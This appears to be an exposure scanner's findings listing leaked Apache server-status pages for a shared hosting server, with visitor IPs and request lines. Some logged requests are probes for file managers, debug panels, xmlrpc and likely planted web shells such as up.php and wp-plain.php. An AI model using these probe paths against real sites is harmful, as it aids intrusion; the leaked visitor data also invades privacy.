      167.172.68.56http/1.13dvi.com:80GET /assets/admin/js/filemanager/dialog.php HTTP/1.1
      
      0-9232050/227/9600_
      25.9484064788200.098.331612.20
      167.172.68.56http/1.13dvi.com:80GET /server/php/ HTTP/1.1
      
      0-9232050/175/9613_
      25.9479083683350.073.051728.30
      51.36.42.25http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      1-9232340/152/8752_
      25.3878394651080.028.991744.27
      51.36.42.25http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      1-9232340/251/9478_
      25.25281284765160.042.201613.71
      167.172.68.56http/1.1alnwisher.com:80GET /filemanager/dialog.php HTTP/1.1
      
      1-9232340/130/9562_
      25.34137178231010.013.811639.37
      138.68.86.32http/1.1randalift.com.sa:80GET /telescope/requests HTTP/1.1
      
      1-92323422/250/9448W
      25.282560116916392785.515.341169.24
      36.182.48.67http/1.1alezdhar.com:443GET /videos/Zed-1296-1.mp4 HTTP/1.1
      
      1-9232340/191/9055_
      25.341393678646730.018.361437.56
      167.172.68.56http/1.13dvi.com:443GET /assets/plugins/filemanager/dialog.php HTTP/1.1
      
      1-9232340/189/9552_
      25.387774470945150.019.081279.67
      197.59.34.5http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/________%20__________%20_____
      
      1-9232340/199/9197_
      25.11336198100832980.035.291548.85
      134.209.254.149http/1.1
      
      1-9232340/301/9320_
      25.262604576329300.013.511176.18
      167.172.68.56http/1.13dvi.com:443GET /admin/auth/login HTTP/1.1
      
      1-9232340
      Found on 2024-06-08 01:09
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df79d5bf016

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 06-Jun-2024 19:03:44 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  14 days 14 hours 58 minutes 54 seconds
      Server load: 0.68 0.54 0.47
      Total accesses: 2056593 - Total Traffic: 317.7 GB - Total Duration: 2483378184
      CPU Usage: u1067.42 s122.07 cu8562.85 cs1949.77 - .926% CPU load
      1.63 requests/sec - 263.7 kB/second - 162.0 kB/request - 1207.52 ms/request
      23 requests currently being processed, 0 workers gracefully restarting, 227 idle workers
      _____R____K____K______________________K_K__K_________KK_________
      __________________________K_______________________________K__WWW
      WWWWWWWWWWWWWWWWWWWWWW___K_____________K_______________W________
      ______K__________K__K__K______W______K________K_K_________......
      ..................._________________KK______....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9126910/485/9759_
      56.631590100373780.060.931382.10
      195.191.219.130http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=1428&t=192.99.37.124&c=5 HTTP
      
      0-9126910/450/8554_
      56.63197258681790.050.641484.45
      165.227.84.14http/1.1php.we3dvi.com:80GET /telescope/requests HTTP/1.1
      
      0-9126910/458/8839_
      56.25149554573450.077.711258.43
      31.167.155.134http/1.1
      
      0-9126910/526/8894_
      56.622031390812370.0112.961350.13
      165.227.84.14http/1.1php.we3dvi.com:80\x16\x03\x01\x01\x01\x01
      
      0-9126910/421/9194_
      56.42108380022390.057.531381.58
      138.68.157.139http/1.1
      
      0-9126910/467/8531R
      56.543442067626260.055.991650.81
      82.167.64.20http/1.1
      
      0-9126910/493/8800_
      56.6810977113654440.048.671493.16
      37.56.28.110http/1.1albayan.edu.sa:443GET /web/252.html2 HTTP/1.1
      
      0-9126910/414/8679_
      56.8813067151290.051.211571.67
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1488&t=164.132.201.165&c=5 HT
      
      0-9126910/474/9605_
      56.786510073583750.074.821613.28
      198.41.230.60http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/info HTTP/1.1
      
      0-9126910/402/9020_
      56.8049067913850.054.221440.52
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=1277&t=195.191.219.132&c=5 HT
      
      0-9126912/452/8867K
      56.9100264879891.963.301204.49
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1579&t=164.132.201.165&c=5 HT
      
      0-9126910/431/9369_
      56.61217062432920.038.461158.62
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1703&t=195.191.219.131&c=5 HT
      
      0-9126910/391/8967_
      56.913178245580.046.091694.82
      95.187.127.6http/1.1albayan.edu.sa:443GET /e_sch/css/images/play.png HTTP/1.1
      
      0-9126910/400/8812_
      56.61226067937600.020.891578.60
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=4&q=566&t=195.191.219.131&c=5 HT
      
      0-9126910/546/8705_
      56.631981119341120.047.181134.71
      165.227.84.14http/1.1php.we3dvi.com:80GET /login.action HTTP/1.1
      
      0-9126911/469/8787K
      56.9202466953766.838.251260.25
      172.69.150.75http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-9126910/546/9130_
      56.8819555833120.041.281537.08
      195.191.219.131http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1488&t=135.181.180.59&c=5 HTT
      
      0-9126910/546/9164_
      56.631720103462400.0154.821699.02
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=5&q=337&t=95.216.9.239&c=5 HTTP/
      
      0-9126910/468/9012_
      56.421012162383890.046.271508.10
      185.200.37.162http/1.1
      
      0-9126910/430/9281_
      56.7768569136380.028.881346.64
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1723&t=193.70.81.103&c=5 HTTP
      
      0-9126910/489/8756_
      56.86214221572110.035.531269.00
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1575&t=95.217.109.26&c=5 HTTP
      
      0-9126910/578/8981_
      56.7390072609450.040.911349.96
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1483&t=164.132.201.165&c=5 HT
      
      0-9126910/459/8869_
      56.63142065794690.021.271406.03
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1714&t=195.191.219.131&c=5 HT
      
      0-9126910/604/9081_
      56.66116062031930.037.501446.48
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1716&t=195.191.219.131&c=5 HT
      
      0-9126910/435/9050_
      56.622142263290040.095.531642.33
      66.249.66.44http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      1-9277770/562/8238_
      73.3898591397810.080.981661.28
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1568&t=178.150.14.250&c=5 HTT
      
      1-9277770/643/8866_
      73.437215878349480.096.041555.27
      213.180.203.174http/1.1albayan.edu.sa:443GET /imgweb/files39/cy.jpg HTTP/1.1
      
      1-9277770/621/9025_
      72.69107575922100.061.121604.71
      138.68.157.139http/1.1
      
      1-9277770/597/8942_
      73.361080107520150.026.581127.01
      138.68.157.139http/1.13dvi.com:80GET / HTTP/1.1
      
      1-9277770/635/8558_
      73.19147073277850.043.941333.76
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1479&t=135.181.180.59&c=5 HTT
      
      1-9277770/837/9052_
      73.29123064710260.077.251249.37
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1480&t=195.191.219.130&c=5 HT
      
      1-9277770/617/8634_
      73.23<
      Found on 2024-06-06 16:03
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7dd44cc46

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 06-Jun-2024 13:39:34 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  14 days 9 hours 34 minutes 45 seconds
      Server load: 0.36 0.41 0.41
      Total accesses: 2006240 - Total Traffic: 314.7 GB - Total Duration: 2460401940
      CPU Usage: u1064.98 s127.75 cu8377.5 cs1910.23 - .923% CPU load
      1.61 requests/sec - 265.2 kB/second - 164.5 kB/request - 1226.37 ms/request
      12 requests currently being processed, 0 workers gracefully restarting, 238 idle workers
      _______W__________K____________K__________________..............
      ..........._K____________________________________K___________WWW
      WWWWWWWWWWWWWWWWWWWWWW___________________________K______________
      ___________K___________K________________________________________
      ___________K_______K__________R_R___________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9126910/268/9542_
      33.674447100044380.052.241373.41
      23.154.177.2http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-9126910/228/8332_
      33.531753458402690.044.551478.36
      37.243.194.129http/1.1jawad.com.sa:443POST /api/v.1/front/category/product HTTP/1.1
      
      0-9126910/237/8618_
      33.472076754367290.067.941248.66
      172.70.91.19http/1.1qr.brunch.ws:443GET /storage/food_image/17088536269753_img680e14be8cba4bfcb7f68
      
      0-9126910/269/8637_
      33.432112390599110.0100.371337.54
      172.70.90.167http/1.1qr.brunch.ws:443GET /storage/food_image/17096783429150_lamp.webp HTTP/1.1
      
      0-9126910/196/8969_
      33.442106779165910.049.101373.16
      172.70.90.29http/1.1qr.brunch.ws:443GET /storage/category_image/17098162451335_12.png HTTP/1.1
      
      0-9126910/230/8294_
      33.432117067255240.047.701642.51
      172.70.90.70http/1.1qr.brunch.ws:443GET /storage/food_image/17085196668732_imgd5955e49a1e64fdf9ea4f
      
      0-9126910/290/8597_
      33.482055113527880.042.451486.93
      172.70.90.146http/1.1qr.brunch.ws:443GET /storage/food_image/17096788182857_mango.webp HTTP/1.1
      
      0-9126910/218/8483W
      33.430067006510.045.391565.85
      172.71.102.172http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-9126910/250/9381_
      33.432111573302000.068.751607.21
      172.70.91.173http/1.1qr.brunch.ws:443GET /storage/food_image/17095826522263_mozerellacroissant.jpg H
      
      0-9126910/232/8850_
      33.52187167636070.041.131427.43
      37.243.194.129http/1.1jawad.com.sa:443GET /public/front_resources/vue/vue-observe-visibility.min.js H
      
      0-9126910/248/8663_
      33.512005264629910.050.791191.98
      172.70.91.205http/1.1qr.brunch.ws:443GET /storage/food_image/17162871303626_novawaterlarge.jpg HTTP/
      
      0-9126910/201/9139_
      33.302074962166230.027.661147.83
      142.154.56.248http/1.1
      
      0-9126910/207/8783_
      33.50200278091920.039.921688.65
      172.70.90.91http/1.1qr.brunch.ws:443GET /storage/food_image/17088460069724_oip7.jpg HTTP/1.1
      
      0-9126910/197/8609_
      33.6837157967796340.011.371569.08
      149.86.144.151http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1901/%D8%
      
      0-9126910/334/8493_
      33.5415421119131490.039.781127.31
      172.70.158.158http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-9126910/231/8549_
      33.65121446421650.025.361247.36
      94.49.61.38http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/HLXomM5BxvRAwmhQXGXcIn
      
      0-9126910/265/8849_
      33.46207655695010.036.741532.54
      172.70.90.176http/1.1qr.brunch.ws:443GET /storage/food_image/17085203627110_imgba5677885d994e3f8d943
      
      0-9126910/297/8915_
      33.6710799103066010.0118.911663.11
      165.22.58.178http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-9126911/287/8831K
      33.6931360185554.339.331501.15
      94.49.61.38http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      0-9126910/202/9053_
      33.56146468681160.023.531341.28
      37.243.194.129http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/4JFb9GjXQsmKTweGfCEBLz
      
      0-9126910/206/8473_
      33.591335221357150.025.041258.51
      172.70.158.130http/1.1qr.brunch.ws:443GET /assets/images/placeholder.png HTTP/1.1
      
      0-9126910/346/8749_
      33.452102772449000.035.351344.40
      172.70.90.117http/1.1qr.brunch.ws:443GET /storage/food_image/17088571791773_img22d8f50a73dd4253ba14a
      
      0-9126910/260/8670_
      33.677722465455950.014.061398.82
      94.49.61.38http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      0-9126910/336/8813_
      33.462088961891140.030.121439.10
      172.70.91.9http/1.1qr.brunch.ws:443GET /storage/food_image/17088489046233_c16b6bc81cf4c9583773be26
      
      0-9126910/248/8863_
      33.45208263129660.089.211636.01
      172.70.91.155http/1.1qr.brunch.ws:443GET /storage/food_image/17088499495311_img5d0fa3d62169406cac3fd
      
      1-9277770/312/7988_
      49.38616291281080.069.561649.86
      142.4.218.114http/1.13dvi.com:443GET / HTTP/1.1
      
      1-9277770/463/8686_
      49.17207574883560.087.081546.31
      172.70.90.100http/1.1qr.brunch.ws:443GET /storage/food_image/17085200704718_img7ebc48f2ebc54b16b5c7c
      
      1-9277770/407/8811_
      49.341414375592410.057.601601.19
      94.49.61.38http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      1-9277770/325/8670_
      49.182075105909050.014.481114.91
      172.70.90.123http/1.1qr.brunch.ws:443GET /storage/food_image/17085175482929_whatsappimage20240221at3
      
      1-9277770/405/8328_
      49.23200573052890.037.651327.47
      172.70.90.25http/1.1qr.brunch.ws:443GET /storage/food_image/17088458847942_oip6.jpg HTTP/1.1
      
      1-9277770/610/8825_
      49.142107264522840.065.871237.99
      172.70.90.27http/1.1qr.brunch.ws:443GET /storage/food_image/17088550718992_imgf1df9a3e7ff14f38
      Found on 2024-06-06 10:39
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df741b7bcbd

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 04-Jun-2024 17:55:37 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  12 days 13 hours 50 minutes 47 seconds
      Server load: 0.55 0.47 0.49
      Total accesses: 1770156 - Total Traffic: 272.5 GB - Total Duration: 2023181177
      CPU Usage: u886.81 s106.69 cu7463.93 cs1706.22 - .935% CPU load
      1.63 requests/sec - 263.0 kB/second - 161.4 kB/request - 1142.94 ms/request
      20 requests currently being processed, 0 workers gracefully restarting, 230 idle workers
      _KR____________________________R____________K___R______K______C_
      ______________W_______K___________________K______________K___WWW
      WWWWWWWWWWWWWWWWWWWWWW____K_______K_____________________________
      __KK________________K_____K____________K________R_________......
      ...................__________________K______....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-955050/516/8495_
      58.641876967396390.070.591122.16
      37.106.198.56http/1.1albayan.edu.sa:443GET /web/476.html2 HTTP/1.1
      
      0-955051/480/7489K
      58.8202393839666.6153.731275.27
      172.71.246.137http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-955050/462/7666R
      58.62213052232410.064.011021.92
      104.28.196.185http/1.1
      
      0-955050/512/7787_
      58.42340372365050.092.521128.91
      188.54.46.17http/1.1
      
      0-955050/680/8101_
      58.7485071937270.027.081108.08
      40.77.167.36http/1.13dvi.com:80GET /portfolio.php HTTP/1.1
      
      0-955050/372/7449_
      58.7112449958187360.0101.651341.68
      176.224.70.124http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%201%D9%85%20%D8%AF%D8%B1%D8
      
      0-955050/449/7712_
      58.794384799736680.0126.741381.88
      5.110.95.210http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/YLEcwFD6lH9itDwVXgrZAj
      
      0-955050/501/7776_
      58.7310869759407510.0186.501395.96
      91.92.250.149http/1.1zed.sa:80GET /wp-content/plugins/apikey/apikey.php?test=hello HTTP/1.1
      
      0-955050/375/8374_
      58.7012278763278790.0118.401351.25
      176.224.70.124http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%201%D9%85%20%D8%AF%D8%B1%D8
      
      0-955050/545/7997_
      58.6225358912580.078.351302.28
      172.105.16.40http/1.1
      
      0-955050/436/7825_
      58.7410687255743390.0109.14999.73
      91.92.250.149http/1.1filter.jawad.com.sa:443POST /wp-plain.php HTTP/1.1
      
      0-955050/488/8312_
      58.64165057120370.0126.97958.51
      188.54.46.17http/1.1albayan.edu.sa:80GET /web/22.html2 HTTP/1.1
      
      0-955050/555/7924_
      58.7753146458113580.088.531511.57
      93.112.200.120http/1.1albayan.edu.sa:443GET /imgweb/files41/%D8%A8%D9%86%D9%83%20%D9%84%D8%BA%D8%AA%D9%
      
      0-955050/468/7777_
      58.74113161040740.074.571285.94
      91.92.250.149http/1.1n.jawad.com.sa:443GET /wp-content/plugins/fix/up.php HTTP/1.1
      
      0-955050/361/7587_
      58.651461106650470.067.22988.23
      188.54.46.17http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-955050/454/7575_
      58.74100039772270.093.201066.07
      188.54.46.17http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      0-955050/455/7781_
      58.8222149397830.073.901301.10
      172.105.16.40http/1.1thenewjeddah.com:443GET /_all_dbs HTTP/1.1
      
      0-955050/482/8009_
      58.721095396775110.0108.861440.86
      91.92.250.149http/1.1new-filter.jawad.com.sa:80GET /wp-content/plugins/fix/up.php HTTP/1.1
      
      0-955050/583/7950_
      58.72109154763820.0173.481379.37
      91.92.250.149http/1.1n.jawad.com.sa:80POST /wp-plain.php HTTP/1.1
      
      0-955050/419/8035_
      58.75743159240830.038.681238.08
      66.249.70.198http/1.1akg.sa:443GET /impromptuary/midvein995711.html HTTP/1.1
      
      0-955050/435/7470_
      58.7750214216523990.090.331096.64
      82.167.82.49http/1.1albayan.edu.sa:443GET /imgweb/p2p2p2.pdf HTTP/1.1
      
      0-955050/461/7816_
      58.7667564675760.049.241205.48
      95.187.146.60http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      0-955050/524/7762_
      58.42274364156728320.063.231299.43
      172.105.16.40http/1.1
      
      0-955050/433/7915_
      58.66143147308810.027.761300.49
      168.149.34.139http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-955050/416/7895_
      58.81362857267990.0135.641462.92
      5.110.95.210http/1.1jawad.com.sa:443POST /api/v.1/front/related/product HTTP/1.1
      
      1-960110/438/7080_
      59.0837384487340.0117.151470.56
      145.82.145.216http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/buttons.png HTTP/1
      
      1-960110/617/7649_
      58.53129270355470.026.341387.97
      188.54.46.17http/1.1
      
      1-960110/471/7816_
      58.91161326665084530.0191.151418.16
      37.106.198.56http/1.1
      
      1-960110/463/7681_
      58.5436707102918940.036.76977.39
      188.53.62.253http/1.1
      
      1-960110/496/7231_
      58.686366215030.079.071203.92
      145.82.145.216http/1.1
      
      1-960110/343/7513_
      58.56110060944680.018.521086.64
      66.118.156.89http/1.1
      
      1-960110/425/7504R
      58.65265393450360.0179.931316.32
      51.36.174.41http/1.1
      
      1-960110/353/7472_
      59.0343356296310.046.65925.19
      5.110.95.210http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/vBf31fXv4mpCKGy62qfYEj
      
      1-960110/553/6994_
      58.2674499196970650.0185.071184.04
      144.86.25.44http/1.1
      Found on 2024-06-04 14:55
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df70eaa8093

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 04-Jun-2024 12:28:36 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  12 days 8 hours 23 minutes 46 seconds
      Server load: 0.65 0.46 0.41
      Total accesses: 1736632 - Total Traffic: 265.8 GB - Total Duration: 1988566971
      CPU Usage: u731.84 s72.67 cu7463.93 cs1706.22 - .935% CPU load
      1.63 requests/sec - 261.2 kB/second - 160.5 kB/request - 1145.07 ms/request
      16 requests currently being processed, 0 workers gracefully restarting, 234 idle workers
      ____________________________K________W____________________W_____
      ___K___________W_________________K__________KW_______________WWW
      WWWWWWWWWWWWWWWWWWWWWW________________K_______W___K________W____
      _________________________W_K__________________W___________......
      ...................__________________K______....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-955050/432/8411_
      40.650766890670.062.661114.23
      54.36.148.117http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-955050/312/7321_
      40.513291037078900.067.751189.29
      217.113.194.254http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1264&t=217.113.194.175&c=5 HT
      
      0-955050/288/7492_
      40.52266437988420.017.64975.55
      217.113.194.252http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=1&q=1647&t=217.113.194.71&c=5 HTT
      
      0-955050/368/7643_
      40.073544372119110.084.191120.57
      102.40.88.59http/1.1
      
      0-955050/447/7868_
      40.55192071639820.017.761098.77
      2.90.134.174http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      0-955050/248/7325_
      40.58132655809300.087.771327.80
      217.113.194.242http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=5&q=1330&t=217.113.194.240&c=5 HT
      
      0-955050/277/7540_
      40.48419298457190.0116.181371.33
      5.163.85.48http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-955050/344/7619_
      40.454451087858334210.087.061296.52
      176.224.21.131http/1.1albayan.edu.sa:443GET /imgweb/1/mathstd.pdf HTTP/1.1
      
      0-955050/274/8273_
      40.56183160374370.091.401324.25
      2.90.134.174http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-955050/367/7819_
      40.1118841458711100.071.121295.05
      46.232.121.98http/1.1
      
      0-955050/341/7730_
      40.6483268252815260.025.67916.26
      176.16.51.113http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      0-955050/400/8224_
      40.6521356690660.064.50896.04
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1717493294.23692202568054199218
      
      0-955050/433/7802_
      40.6290657480280.079.741502.78
      217.113.194.249http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=5&q=1484&t=217.113.194.72&c=5 HTT
      
      0-955050/298/7607_
      40.52298658878190.021.921233.28
      217.113.194.250http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=5&q=1084&t=217.113.194.146&c=5 HT
      
      0-955050/272/7498_
      40.53246498068060.042.63963.64
      217.113.194.248http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=5&q=1708&t=217.113.194.174&c=5 HT
      
      0-955050/364/7485_
      40.06382139607490.063.721036.59
      5.163.85.48http/1.1
      
      0-955050/268/7594_
      40.54224248520630.067.261294.46
      2.90.71.104http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-955050/382/7909_
      39.96460295672280.089.311421.32
      153.94.68.200http/1.1
      
